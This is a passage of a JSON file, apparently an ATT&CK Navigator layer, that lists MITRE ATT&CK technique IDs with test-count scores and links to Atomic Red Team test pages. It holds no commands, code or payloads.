Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.004/T1137.004.md"}]},{"techniqueID":"T1137.006","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.006/T1137.006.md"}]},{"techniqueID":"T1140","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1140/T1140.md"}]},{"techniqueID":"T1176","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1176/T1176.md"}]},{"techniqueID":"T1187","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1187/T1187.md"}]},{"techniqueID":"T1195","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1195/T1195.md"}]},{"techniqueID":"T1197","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1197/T1197.md"}]},{"techniqueID":"T1201","score":12,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1201/T1201.md"}]},{"techniqueID":"T1202","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1202/T1202.md"}]},{"techniqueID":"T1204","score":12,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1204/T1204.md"}]},{"techniqueID":"T1204.002","score":11,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1204.002/T1204.002.md"}]},{"techniqueID":"T1204.003","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1204.003/T1204.003.md"}]},{"techniqueID":"T1207","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1207/T1207.md"}]},{"techniqueID":"T1216","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1216/T1216.md"}]},{"techniqueID":"T1216.001","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1216.001/T1216.001.md"}]},{"techniqueID":"T1217","score":9,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1217/T1217.md"}]},{"techniqueID":"T1218","score":76,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218/T1218.md"}]},{"techniqueID":"T1218.001","score":8,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.001/T1218.001.md"}]},{"techniqueID":"T1218.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.002/T1218.002.md"}]},{"techniqueID":"T1218.003","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.003/T1218.003.md"}]},{"techniqueID":"T1218.004","score":8,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.004/T1218.004.md"}]},{"techniqueID":"T1218.005","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.005/T1218.005.md"}]},{"techniqueID":"T1218.007","score":11,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.007/T1218.007.md"}]},{"techniqueID":"T1218.008","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.008/T1218.008.md"}]},{"techniqueID":"T1218.009","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.009/T1218.009.md"}]},{"techniqueID":"T1218.010","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.010/T1218.010.md"}]},{"techniqueID":"T1218.011","score":13,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.011/T1218.011.md"}]},{"techniqueID":"T1219","score":11,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1219/T1219.md"}]},{"techniqueID":"T1220","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1220/T1220.md"}]},{"techniqueID":"T1221","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1221/T1221.md"}]},{"techniqueID":"T1222","score":19,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222/T1222.md"}]},{"techniqueID":"T1222.001","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222.001/T1222.001.md"}]},{"techniqueID":"T1222.002","score":14,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222.002/T1222.002.md"}]},{"techniqueID":"T1482","score":8,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1482/T1482.md"}]},{"techniqueID":"T1484","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1484/T1484.md"}]},{"techniqueID":"T1484.001","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1484.001/T1484.001.md"}]},{"techniqueID":"T1484.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1484.002/T1484.002.md"}]},{"techniqueID":"T1485","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1485/T1485.md"}]},{"techniqueID":"T1486","score":8,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1486/T1486.md"}]},{"techniqueID":"T1489","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1489/T1489.md"}]},{"techniqueID":"T1490","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1490/T1490.md"}]},{"techniqueID":"T1491","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1491/T1491.md"}]},{"techniqueID":"T1491.001","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1491.001/T1491.001.md"}]},{"techniqueID":"T1496","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1496/T1496.md"}]},{"techniqueID":"T1497","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1497/T1497.md"}]},{"techniqueID":"T1497.001","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1497.001/T1497.001.md"}]},{"techniqueID":"T1505","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505/T1505.md"}]},{"techniqueID":"T1505.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.002/T1505.002.md"}]},{"techniqueID":"T1505.003","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.003/T1505.003.md"}]},{"techniqueID":"T1505.004","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.004/T1505.004.md"}]},{"techniqueID":"T1505.005","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.005/T1505.005.md"}]},{"techniqueID":"T1518","score":16,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518/T1518.md"}]},{"techniqueID":"T1518.001","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518.001/T1518.001.md"}]},{"techniqueID":"T1526","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1526/T1526.md"}]},{"techniqueID":"T1528","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1528/T1528.md"}]},{"techniqueID":"T1529","score":12,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1529/T1529.md"}]},{"techniqueID":"T1530","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1530/T1530.md"}]},{"techniqueID":"T1531","score":8,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1531/T1531.md"}]},{"techniqueID":"T1539","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1539/T1539.md"}]},{"techniqueID":"T1543","score":11,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543/T1543.md"}]},{"techniqueID":"T1543.001","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.001/T1543.001.md"}]},{"techniqueID":"T1543.002","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.002/T1543.002.md"}]},{"techniqueID":"T1543.003","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.003/T1543.003.md"}]},{"techniqueID":"T1543.004","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.004/T1543.004.md"}]},{"techniqueID":"T1546","score":38,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546/T1546.md"}]},{"techniqueID":"T1546.001","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.001/T1546.001.md"}]},{"techniqueID":"T1546.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.002/T1546.002.md"}]},{"techniqueID":"T1546.003","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.003/T1546.003.md"}]},{"techniqueID":"T1546.004","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.004/T1546.004.md"}]},{"techniqueID":"T1546.005","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.005/T1546.005.md"}]},{"techniqueID":"T1546.007","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.007/T1546.007.md"}]},{"techniqueID":"T1546.008","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.008/T1546.008.md"}]},{"techniqueID":"T1546.009","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.009/T1546.009.md"}]},{"techniqueID":"T1546.010","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.010/T1546.010.md"}]},{"techniqueID":"T1546.011","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.011/T1546.011.md"}]},{"techniqueID":"T1546.012","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.012/T1546.012.md"}]},{"techniqueID":"T1546.013","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.013/T1546.013.md"}]},{"techniqueID":"T1546.014","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.014/T1546.014.md"}]},{"techniqueID":"T1546.015","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.015/T1546.015.md"}]},{"techniqueID":"T1547","score":45,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547/T1547.md"}]},{"techniqueID":"T1547.001","score":17,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.001/T1547.001.md"}]},{"techniqueID":"T1547.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.002/T1547.002.md"}]},{"techniqueID":"T1547.003","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.003/T1547.003.md"}]},{"techniqueID":"T1547.004","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.004/T1547.004.md"}]},{"techniqueID":"T1547.005","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.005/T1547.005.md"}]},{"techniqueID":"T1547.006","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.006/T1547.006.md"}]},{"techniqueID":"T1547.007","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.007/T1547.007.md"}]},{"techniqueID":"T1547.008","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.008/T1547.008.md"}]},{"techniqueID":"T1547.009","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.009/T1547.009.md"}]},{"techniqueID":"T1547.010","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.010/T1547.010.md"}]},{"techniqueID":"T1547.012","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.012/T1547.012.md"}]},{"techniqueID":"T1547.014","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.014/T1547.014.md"}]},{"techniqueID":"T1547.015","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.015/T1547.015.md"}]},{"techniqueID":"T1548","score":40,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548/T1548.md"}]},{"techniqueID":"T1548.001","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.001/T1548.001.md"}]},{"techniqueID":"T1548.002","score":24,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.002/T1548.002.md"}]},{"techniqueID":"T1548.003","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.003/T1548.003.md"}]},{"techniqueID":"T1550","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550/T1550.md"}]},{"techniqueID":"T1550.002","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550.002/T1550.002.md"}]},{"techniqueID":"T1550.003","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550.003/T1550.003.md"}]},{"techniqueID":"T1552","score":38,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552/T1552.md"}]},{"techniqueID":"T1552.001","score":12,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.001/T1552.001.md"}]},{"techniqueID":"T1552.002","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.002/T1552.002.md"}]},{"techniqueID":"T1552.003","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.003/T1552.003.md"}]},{"techniqueID":"T1552.004","score":14,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.004/T1552.004.md"}]},{"techniqueID":"T1552.005","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.005/T1552.005.md"}]},{"techniqueID":"T1552.006","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.006/T1552.006.md"}]},{"techniqueID":"T1552.007","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.007/T1552.007.md"}]},{"techniqueID":"T1553","score":13,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553/T1553.md"}]},{"techniqueID":"T1553.001","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.001/T1553.001.md"}]},{"techniqueID":"T1553.003","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.003/T1553.003.md"}]},{"techniqueID":"T1553.004","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.004/T1553.004.md"}]},{"techniqueID":"T1553.005","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.005/T1553.005.md"}]},{"techniqueID":"T1555","score":29,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555/T1555.md"}]},{"techniqueID":"T1555.001","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.001/T1555.001.md"}]},{"techniqueID":"T1555.003","score":16,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.003/T1555.003.md"}]},{"techniqueID":"T1555.004","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.004/T1555.004.md"}]},{"techniqueID":"T1556","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1556/T1556.md"}]},{"techniqueID":"T1556.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1556.002/T1556.002.md"}]},{"techniqueID":"T1556.003","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1556.003/T1556.003.md"}]},{"techniqueID":"T1557","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1557/T1557.md"}]},{"techniqueID":"T1557.001","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1557.001/T1557.001.md"}]},{"techniqueID":"T1558","score":13,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558/T1558.md"}]},{"techniqueID":"T1558.001","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.001/T1558.001.md"}]},{"techniqueID":"T1558.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.002/T1558.002.md"}]},{"techniqueID":"T1558.003","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.003/T1558.003.md"}]},{"techniqueID":"T1558.004","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.004/T1558.004.md"}]},{"techniqueID":"T1559","score":8,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1559/T1559.md"}]},{"techniqueID":"T1559.002","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1559.002/T1559.002.md"}]},{"techniqueID":"T1560","score":14,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560/T1560.md"}]},{"techniqueID":"T1560.001","score":9,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.001/T1560.001.md"}]},{"techniqueID":"T1560.002","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.002/T1560.002.md"}]},{"techniqueID":"T1562","score":111,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562/T1562.md"}]},{"techniqueID":"T1562.001","score":49,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.001/T1562.001.md"}]},{"techniqueID":"T1562.002","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.002/T1562.002.md"}]},{"techniqueID":"T1562.003","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.003/T1562.003.md"}]},{"techniqueID":"T1562.004","score":22,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.004/T1562.004.md"}]},{"techniqueID":"T1562.006","score":9,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.006/T1562.006.md"}]},{"techniqueID":"T1562.008","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.008/T1562.008.md"}]},{"techniqueID":"T1562.009","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.009/T1562.009.md"}]},{"techniqueID":"T1563","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1563/T1563.md"}]},{"techniqueID":"T1563.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1563.002/T1563.002.md"}]},{"techniqueID":"T1564","score":28,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564/T1564.md"}]},{"techniqueID":"T1564.001","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.001/T1564.001.md"}]},{"techniqueID":"T1564.002","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.002/T1564.002.md"}]},{"techniqueID":"T1564.003","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.003/T1564.003.md"}]},{"techniqueID":"T1564.004","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.004/T1564.004.md"}]},{"techniqueID":"T1564.006","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.006/T1564.006.md"}]},{"techniqueID":"T1566","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1566/T1566.md"}]},{"techniqueID":"T1566.001","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1566.001/T1566.001.md"}]},{"techniqueID":"T1567","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1567/T1567.md"}]},{"techniqueID":"T1567.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1567.002/T1567.002.md"}]},{"techniqueID":"T1567.003","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1567.003/T1567.003.md"}]},{"techniqueID":"T1569","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569/T1569.md"}]},{"techniqueID":"T1569.001","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569.001/T1569.001.md"}]},{"techniqueID":"T1569.002","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569.002/T1569.002.md"}]},{"techniqueID":"T1570","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1570/T1570.md"}]},{"techniqueID":"T1571","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1571/T1571.md"}]},{"techniqueID":"T1572","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1572/T1572.md"}]},{"techniqueID":"T1573","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1573/T1573.md"}]},{"techniqueID":"T1574","score":13,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574/T1574.md"}]},{"techniqueID":"T1574.001","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.001/T1574.001.md"}]},{"techniqueID":"T1574.002","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.002/T1574.002.md"}]},{"techniqueID":"T1574.006","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.006/T1574.006.md"}]},{"techniqueID":"T1574.008","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.008/T1574.008.md"}]},{"techniqueID":"T1574.009","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.009/T1574.009.md"}]},{"techniqueID":"T1574.011","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.011/T1574.011.md"}]},{"techniqueID":"T1574.012","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.012/T1574.012.md"}]},{"techniqueID":"T1580","score":1,"enabled":true,"links":[{"label":"View 